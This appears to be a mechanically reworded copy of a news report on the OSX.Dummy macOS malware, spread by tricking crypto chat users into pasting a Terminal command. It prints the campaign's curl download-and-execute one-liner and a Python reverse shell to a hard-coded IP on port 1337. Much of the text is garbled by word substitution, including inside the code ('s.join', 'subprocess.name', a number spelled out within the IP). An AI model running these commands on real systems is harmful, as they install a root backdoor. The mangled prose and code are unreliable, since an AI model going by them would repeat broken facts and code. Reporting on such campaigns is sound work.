reader comments 160
someone impersonating directors of cryptocurrency-linked dialogue channels on Slack, Discord, and other social messaging systems has been trying to entice others into setting up macOS malware. The social-engineering campaign contains posting a script in discussions and encouraging individuals to reproduction and paste that script into a Terminal window on their Macs. The command downloads a tremendous (34 megabyte) file and executes it, setting up a far off connection that acts as a backdoor for the attacker.
Patrick Wardle, a Mac malware skilled, additionally examined the malware and dubbed it “OSX.Dummy” because, as he wrote:
- the infection method is dumb
- the large dimension of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are fairly constrained (and for that reason fairly dumb)
- it be trivial to become aware of at each step (that dumb)
- … and at last, the malware saves the person’s password to dumpdummy
The attack, first cited by means of Remco Verhoef of SANS nowadays, downloads its awkward payload from a faraway server, makes that file executable, and runs it. It appears something like this:
cd /tmp && curl -s curl $ MALICIOUS_URL > script && chmod +x script && ./script
The monster binary consists of with it a host of libraries, together with Open SSL libraries to encrypt its communications back to the server—a system working in an information core of the internet hosting issuer CrownCloud. once it executes, it uses the sudo command to make itself owned by macOS’s root user. in order for this to happen, the sufferer has to enter a password to enable the script to proceed. The script outlets that password in a brief file referred to as “dumpdummy”. The script also issues commands to add itself to the startup list for macOS—making itself persistent.
The script’s backdoor code, as Wardle referred to, is a recursive Python command-line name with a tough-coded IP handle for the connection that uses port 1337—an glaring leetspeak shaggy dog story.
python -c ‘import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.join((“185.243.a hundred and fifteen.230”,1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.name([“/bin/sh”,”-i”]);’
The attacker’s intent is not yet clear. however as a result of all of this executes through a Terminal window, it bypasses MacOS’s GateKeeper malware protection, despite being unsigned code. And it gives the attacker the capability to execute command-line code because the root person on infected Macs. Of course, the code has to beat the standard sense of the sufferer as well.